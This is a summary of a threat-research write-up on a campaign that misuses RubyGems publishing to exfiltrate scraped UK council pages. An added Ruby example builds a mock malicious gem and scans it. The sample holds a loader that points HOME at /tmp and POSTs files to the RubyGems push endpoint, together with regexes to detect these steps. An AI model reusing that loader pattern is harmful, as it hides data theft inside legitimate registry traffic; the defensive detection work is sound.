Socket's threat research team has identified a campaign it calls GemStuffer: 155+ RubyGems packages that abuse the package registry as a data exfiltration channel rather than as a malware distribution vector. The malicious gems scrape UK local government council portal pages (Lambeth, Wandsworth, Southwark) with Ruby's Net::HTTP, pack the scraped HTML into valid .gem archives, and publish those archives to RubyGems using hardcoded API keys. Because the data travels gzip-compressed inside tar archives, over TLS, to a legitimate registry, standard DLP inspection does not see it. The campaign compartmentalizes its activity across multiple API keys, stages files in ephemeral /tmp directories, overrides HOME so that the gem tooling reads injected credentials from that staging area, and publishes both through the gem CLI and through direct HTTP POSTs to the registry. RubyGems temporarily disabled new account registration in response. Defenders are advised to yank the identified packages, audit /tmp directories, block outbound gem push in CI pipelines that do not publish, and monitor for ENV['HOME'] being mutated to /tmp paths.
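The following is an added example, not Socket's code and not code from the campaign. It builds an in-memory .gem that is "stuffed" the way the summary describes (a loader script that redirects HOME to /tmp and POSTs to the RubyGems push endpoint, plus a scraped HTML page packed under lib/), then scans the archive the way a registry-side or CI check could: unpack the outer tar, gunzip data.tar.gz, unpack the inner tar, and classify each file. The gem name, file names, the HTML fragment and the loader source are all constructed; the HTML and HOME/push regexes are illustrative heuristics, not Socket's detection rules.

```ruby
# Added example (not Socket's or the campaign's code): build a stuffed .gem in
# memory, then scan it. Every name and payload below is constructed.
require 'rubygems/package'
require 'zlib'
require 'stringio'

# Write a tar archive from {name => body} and return it as a binary string.
def tar_bytes(files)
  io = StringIO.new(''.b)
  Gem::Package::TarWriter.new(io) do |tar|
    files.each do |name, body|
      tar.add_file_simple(name, 0o644, body.bytesize) { |f| f.write(body) }
    end
  end
  io.string
end

# Assemble a .gem: an outer tar holding metadata.gz and data.tar.gz
# (checksums.yaml.gz is omitted here). Both layers are gzip-inside-tar, which
# is why a DLP scanner watching the TLS stream sees only opaque binary.
def build_gem(name, files)
  metadata = "--- !ruby/object:Gem::Specification\nname: #{name}\nversion: 0.0.1\n"
  tar_bytes('metadata.gz' => Zlib.gzip(metadata),
            'data.tar.gz' => Zlib.gzip(tar_bytes(files)))
end

# Read a tar archive back into {name => body}.
def untar(bytes)
  out = {}
  Gem::Package::TarReader.new(StringIO.new(bytes)) do |tar|
    tar.each { |entry| out[entry.full_name] = entry.read.to_s }
  end
  out
end

# Heuristics (assumed, not Socket's rules): an HTML document where Ruby source
# should be, HOME pointed at /tmp, and a direct POST to the RubyGems push API.
HTML_HINT    = /\A\s*(<!doctype\s+html|<html|<head|<body|<div)/i
HOME_TO_TMP  = /ENV\[['"]HOME['"]\]\s*=\s*['"]\/tmp/
GEM_PUSH_URL = %r{rubygems\.org/api/v1/gems}

# Return the list of reasons a packaged file looks suspicious (empty if clean).
def classify(name, body)
  reasons = []
  reasons << 'html payload' if body[0, 512] =~ HTML_HINT
  reasons << 'non-ruby file under lib/' if name.start_with?('lib/') && !name.end_with?('.rb')
  if name.end_with?('.rb')
    reasons << 'HOME redirected to /tmp' if body =~ HOME_TO_TMP
    reasons << 'direct push to RubyGems API' if body =~ GEM_PUSH_URL
  end
  reasons
end

# Unpack both layers of a .gem and report findings plus the share of the
# payload bytes that are HTML rather than code.
def scan_gem(gem_bytes)
  outer = untar(gem_bytes)
  files = untar(Zlib.gunzip(outer.fetch('data.tar.gz')))
  total = files.values.sum(&:bytesize)
  findings = files.map { |n, b| [n, classify(n, b)] }.reject { |_, r| r.empty? }.to_h
  html_bytes = files.sum { |n, b| findings.fetch(n, []).include?('html payload') ? b.bytesize : 0 }
  { findings: findings, html_ratio: total.zero? ? 0.0 : html_bytes.to_f / total }
end

# Constructed sample: a scraped-looking HTML page and a loader that mirrors the
# behaviours in the write-up (HOME override, direct HTTP POST publish).
SCRAPED_PAGE = '<!DOCTYPE html><html><head><title>Planning applications</title></head><body>' +
               ('<div class="application">ref 0001</div>' * 200) + '</body></html>'
LOADER_SOURCE = <<~RUBY
  require 'net/http'
  ENV['HOME'] = '/tmp/.stage'   # gem tooling now reads /tmp/.stage/.gem/credentials
  Net::HTTP.post(URI('https://rubygems.org/api/v1/gems'), File.binread(ARGV[0]))
RUBY
SAMPLE_FILES = {
  'lib/council_data_demo.rb' => LOADER_SOURCE,
  'lib/data/page1.html'      => SCRAPED_PAGE,
}.freeze

if __FILE__ == $PROGRAM_NAME
  report = scan_gem(build_gem('council-data-demo', SAMPLE_FILES))
  report[:findings].each { |name, reasons| puts "#{name}: #{reasons.join(', ')}" }
  puts format('html share of payload: %.1f%%', report[:html_ratio] * 100)
end
```

The html_ratio figure is the cheap registry-side signal: a gem whose data.tar.gz is overwhelmingly HTML rather than Ruby has no legitimate reason to exist. The HOME regex is the static counterpart of the runtime check the write-up recommends (watching for ENV['HOME'] being pointed at /tmp), and the push-URL regex catches the direct HTTP publishing path that does not go through the gem CLI.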

From socket.dev (11 min read)
Table of contents

- Attack Chain Summary
- Targeted Scraping of UK Council Portals
- Malicious Gem Staging
- Credential Injection via HOME Override
- Malicious Gem Push/Exfiltration
- Recommended Actions
- Indicators of Compromise
